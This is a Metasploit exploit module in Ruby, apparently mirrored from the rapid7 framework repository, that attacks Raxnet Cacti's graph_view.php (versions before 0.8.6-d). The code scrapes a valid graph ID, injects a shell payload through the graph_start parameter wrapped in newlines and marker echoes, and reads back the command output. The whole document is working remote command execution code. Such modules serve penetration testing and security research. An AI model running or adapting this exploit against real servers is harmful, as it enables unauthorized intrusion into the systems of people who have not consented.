Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Cacti graph_view.php Remote Command Execution',

17
        'Description' => %q{

18
          This module exploits an arbitrary command execution vulnerability in the

19
          Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to

20
          0.8.6-d are vulnerable.

21
        },

22
        'Author' => [ 'David Maciejak <david.maciejak[at]kyxar.fr>', 'hdm' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'OSVDB', '17539' ],

26
          [ 'BID', '14042' ],

27
        ],

28
        'Privileged' => false,

29
        'Payload' => {

30
          'DisableNops' => true,

31
          'Space' => 512,

32
          'Compat' =>

33
                        {

34
                          'PayloadType' => 'cmd',

35
                          'RequiredCmd' => 'generic perl ruby python telnet',

36
                        }

37
        },

38
        'Platform' => 'unix',

39
        'Arch' => ARCH_CMD,

40
        'Targets' => [[ 'Automatic', {}]],

41
        'DisclosureDate' => '2005-01-15',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]),

54
      ]

55
    )

56
  end

57


58
  def exploit

59
    # Obtain a valid image ID

60
    res = send_request_cgi({

61
      'uri' => normalize_uri(datastore['URI']),

62
      'vars_get' =>

63
        {

64
          'action' => 'list'

65
        }

66
    }, 10)

67


68
    if (not res)

69
      print_error("The server gave no response")

70
      return

71
    end

72


73
    m = res.body.match(/local_graph_id=(.*?)&/)

74
    if (not m)

75
      print_error("Could not locate a valid image ID")

76
      return

77
    end

78


79
    # Trigger the command execution bug

80
    res = send_request_cgi({

81
      'uri' => normalize_uri(datastore['URI']),

82
      'vars_get' =>

83
        {

84
          'local_graph_id' => m[1],

85
          'graph_start' => "\necho YYY;#{payload.encoded};echo YYY;echo\n"

86
        }

87
    }, 25)

88


89
    if (res)

90
      print_status("The server returned: #{res.code} #{res.message}")

91
      print("")

92


93
      m = res.body.match(/YYY(.*)YYY/)

94


95
      if (m)

96
        print_status("Command output from the server:")

97
        print(m[1])

98
      else

99
        print_status("This server may not be vulnerable")

100
      end

101


102
    else

103
      print_status("No response from the server")

104
    end

105
  end

106
end

107


108